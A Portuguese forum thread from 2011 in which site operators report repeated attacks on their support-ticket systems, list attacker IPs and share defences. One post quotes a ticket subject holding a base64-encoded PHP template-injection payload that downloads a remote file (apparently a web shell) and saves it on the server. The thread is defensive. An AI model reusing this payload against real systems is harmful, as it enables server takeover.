Marco Antonio Postado Dezembro 18, 2011 Compartilhar Postado Dezembro 18, 2011 Eu estou sendo o fregues.. agora de novo hehehe a 4 vez, hoje já a segunda, o IP foi 197.15.22.224 Link para o comentário Compartilhar em outros sites More sharing options...
Rocha Neto Postado Dezembro 18, 2011 Compartilhar Postado Dezembro 18, 2011 No meu tbm Marco, todos os dias são pelo menos 2 tentativas. Link para o comentário Compartilhar em outros sites More sharing options...
Michael Postado Dezembro 18, 2011 Compartilhar Postado Dezembro 18, 2011 aconteceu mesma coisa comigo mais chego por ticket mais ele não mudou a senha nem entrou no admin, tinha acontecido semana passada e ele mudo a senha mais não entrou. Link para o comentário Compartilhar em outros sites More sharing options...
Marco Antonio Postado Dezembro 18, 2011 Compartilhar Postado Dezembro 18, 2011 Novamente atacado hehehe hoje é a 3 vez, so que me causou curiosidade, pois o usuario usou IP brazuca 177.12.131.19 do Estado de : Amapa Cidade de: Macapá Link para o comentário Compartilhar em outros sites More sharing options...
EuMarcos Postado Dezembro 18, 2011 Compartilhar Postado Dezembro 18, 2011 Aqui foi bloqueado no servidor para rejeitar ips da: Arabia, China... kkk Hoje tive 2 ataques e os ips eram do Brasil, SP e RS. Link para o comentário Compartilhar em outros sites More sharing options...
Cassiano Teixeira Postado Dezembro 18, 2011 Compartilhar Postado Dezembro 18, 2011 Este fim de semana estou recebendo outros também - Não vou postar aqui todos, pois fica repetitivo, mais pelo visto, o "cidadão" voltou a incomodar. Link para o comentário Compartilhar em outros sites More sharing options...
leonelborges Postado Dezembro 19, 2011 Compartilhar Postado Dezembro 19, 2011 + 1 para coleção Departamento: Abuse e SPAM Assunto: {php}eval(base64_decode('JGNvZGUgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2Jsb2dnZXIuY29tLnRlcm5hdGVrb3RhLmdvLmlkL3RleHQvd3NvYjIucGhwJyk7CiRmbyA9IGZvcGVuKCJ3c29iMi5waHAiLCJ3Iik7CmZ3cml0ZSgkZm8sJGNvZGUpOw==')){/php} Prioridade: Medium IP: 103.10.64.30 IP Country: Indonesia ------------------------- Lembrando que ele so conseguiu criar o ticket, porque o departamento estava livre para criar tickets para não clientes. Permitir abertura de tickets no departamento somente para clientes registrados. Opções/Suporte/Departamentos de Suporte, edite o departamento desejado e ative (Permitir abertura de tickets nesse departamento somente por clientes registrados) Link para o comentário Compartilhar em outros sites More sharing options...
Enio F. Postado Dezembro 19, 2011 Compartilhar Postado Dezembro 19, 2011 Há alguns dias atrás recebi no meu sistema diversos cadastros (76 para ser mais exato) com três IP's diferentes vindos do Japão em dois dias, nos primeiros até tentamos contatar os responsáveis pelos registros mas não obtivemos nenhuma resposta. Não sei ao certo se isso foi uma tentativa de invasão mas foi um caso atípico Link para o comentário Compartilhar em outros sites More sharing options...
Agencia Moderna Postado Dezembro 19, 2011 Compartilhar Postado Dezembro 19, 2011 Eu tive esse ataque apenas uma vez, depois disso não tentaram mais... Também desabilitei a função base64_decode no php.ini... Link para o comentário Compartilhar em outros sites More sharing options...
Clebson Postado Dezembro 20, 2011 Compartilhar Postado Dezembro 20, 2011 Pessoal, por que isso esta acontecendo? Simples, os códigos para invasão foram todos divulgados publicamente, aqui no fórum, então o "palhaço" que esta tentando invadir, pegou os códigos aqui no fórum e saiu enviando para todas as empresas. Esses códigos jamais deveriam ser publicados assim. Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados